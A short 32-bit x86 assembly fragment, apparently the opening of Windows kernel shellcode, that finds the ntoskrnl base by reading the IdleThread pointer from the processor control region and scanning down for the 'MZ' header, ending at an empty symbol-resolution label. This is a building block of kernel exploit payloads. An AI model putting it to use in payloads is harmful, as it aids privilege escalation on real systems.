bits 32

find_ntoskrnl_pcr:
	mov  eax, [0xffdff12c] ; fs:0x12c Pcr->Pcrb->IdleThread (2k, xpsp2)
scan_down:
	and  ax, 0xf001
	dec  eax,
	cmp  [eax], word 0x5a4d
	jnz  scan_down

resolve_sym: